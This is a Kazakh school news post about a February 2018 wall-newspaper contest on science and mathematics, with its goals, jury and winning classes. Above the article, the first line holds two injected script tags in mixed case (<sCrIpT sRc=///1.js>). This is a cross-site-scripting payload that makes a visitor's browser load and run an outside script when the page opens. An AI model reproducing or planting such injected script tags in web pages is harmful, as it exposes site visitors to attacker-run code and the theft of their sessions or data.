<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.02.2018
2018 жылдың 20-ақпан күні мектепішілік «Жаратылыстану-математика еліне саяхат» тақырыбында қабырға газеттер байқауына мектептің 5-10 сынып оқушылары қатысты. Ережеге сәйкес келесі міндеттер қойылды:
- Оқушылардың өз бетімен жұмыс істеуін анықтау және ынталандыру.
- Оқушылардың шығармашылық белсенділігін қолдау.
- Ақпараттық және коммуникативтік құзыреттілікті қалыптастыру.
- Бірлескен жұмыс дағдыларын дамыту.
- Жаратылыстану-математика пәндеріне қызығушылығын арттыру.
Мектептің 5-10 сынып оқушылары қойылған талаптар бойынша қабырға газетін А1 форматты ватманда орындады. Газет материалдары ретінде жаратылыстану-математикалық пәндерге қатысты ғалымдар туралы мәлімет, химия, биология, математика, физика, география, информатика салалырындағы ғылыми жаңалықтар, мақалалар, әңгімелер, суреттер, өлеңдер және басқа материалдарды пайдаланды. Әр критерий бойынша 10 балл қойылды. Қорғау барысында әр сынып оқушылары 7 мин уақытта жұмыстарын сипаттап берді.
Әділқазылар алқасы: директордың тәрбие жөніндегі орынбасары Омарова Асемгуль Бакировна, бейнелеу пәнінің мұғалімі Жуманова Сауле Есеновна, физика пәнінің мұғалімі Оразбаева Багила Мукашевна байқау материаларын көркемдік рәсімдеу, мазмұнының бірегейлігі, сауаттылық, тақырыптамаға сәйкес келуі, қорғау критерийлер бойынша бағалап, келесі қорытынды шығарды: бірінші жүлделі орынға ие болған VІ сынып, екінші орынға – V сынып, үшінші орынға - ІХ «Ә» сынып.
Сабақтан тыс іс-шара оқушыларды көркемдік шығармашылыққа тәрбиелеу жолында мақсатына жетті.